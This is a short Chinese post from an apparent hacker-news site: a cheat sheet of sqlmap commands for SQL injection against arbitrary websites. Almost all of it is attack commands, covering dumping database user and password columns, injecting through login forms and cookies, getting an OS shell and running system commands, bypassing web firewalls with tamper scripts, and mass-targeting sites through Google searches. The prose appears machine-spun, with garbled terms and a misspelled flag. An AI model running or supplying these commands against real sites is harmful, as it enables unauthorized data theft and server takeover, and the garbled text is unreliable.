简单注入软件SqlMap神器

简单注入软件SqlMap神器

入侵渗透hacker2019-07-17 23:38:2715082A+A-

各大网站都有很多sql引入神器,但现还有的也不好用了如啊D,明小子,御剑,不过御剑还是很不错的。

现在给大家推荐一些大神经常用的引入神器SQLmap(sql枚举数据库)相信很多小网络黑客都还不知道或者不了解。 

在这我也就不详说他的用途毕竟百度有工具可以在BT5的中文网下裁

现在却说一下他的一些指令使用方法:

Mysql数据库引入:

sqlmap -u "网页地址" --dbs

sqlmap -u "网页地址" -D 数据库 --tables

sqlmap -u "网页地址" -D 数据库 -T 表段 --columns

sqlmap -u "网页地址" -D 数据库 -T 表段 -C Id,user,pass --dump

--------------------------------------------------------------------------

Post登录框引入:

./sqlmap.py -r *.txt -p tfUPass

sqlmap -u 网页地址 --forms

sqlmap -u 网页地址 "tfUName=1(若为随意数)&tfUPass=1(若为随意数)"

--------------------------------------------------------------------------

伪静态引入:

sqlmap -u 网页地址/x*.html语言 --dbs

---------------------------------------------------------------------------

互动写shell及指令执行:

cmdshell:

sqlmap -u 网页地址 --Os-shell

特定站点类型.1.asp 2.aspx 3.jsp 4.Python(default)

特定站点主目录:盘符/文件目录/

指令执行:

sqlmap -u 网页地址 --Os-cmd=ipconfig

特定站点类型.1.asp 2.aspx 3.jsp 4.Python(default)

特定站点主目录:盘符/文件目录/

--------------------------------------------------------------------------

Cookie引入:

sqlmap -u "网页地址" --cookie "Id=" --list --level 2

sqlmap -u "网页地址" --cookie "Id=" --clumns -T 表段 --level 2

sqlmap -u "网页地址" --cookie "Id=" --dump -T 表段 -C "user,pass" --level 2

--------------------------------------------------------------------------

恳求廷时引入:

sqlmap --dbs -u usr/x*.html语言 --delay 1(时间,可随意)

sqlmap --dbs -u usr/x*.html语言 --safe-freq 1(频次,可随意)

--------------------------------------------------------------------------

绕开WAF服务器防火墙:

sqlmap -u 网页地址 -v 3 --dbs --batch --tamper "space2morehash.py"

1.space2hash.py 2.base64encode.py 3.charencode.py

--------------------------------------------------------------------------

谷歌大批量检测引入:

sqlmap -g 关键字

不明白没事儿 百度是你最好的老师。


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 鸢旧双笙2022-05-31 14:51:22
  • -------------------------------------------------互动写shell及指令执行:cmdshell:sqlmap -u 网页地址 --Os-shell特定站点类型.1.asp 2.aspx 3.jsp 4.Python(defaul
  • 掩吻艳鬼2022-05-31 16:58:12
  • -level 2--------------------------------------------------------------------------恳求

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理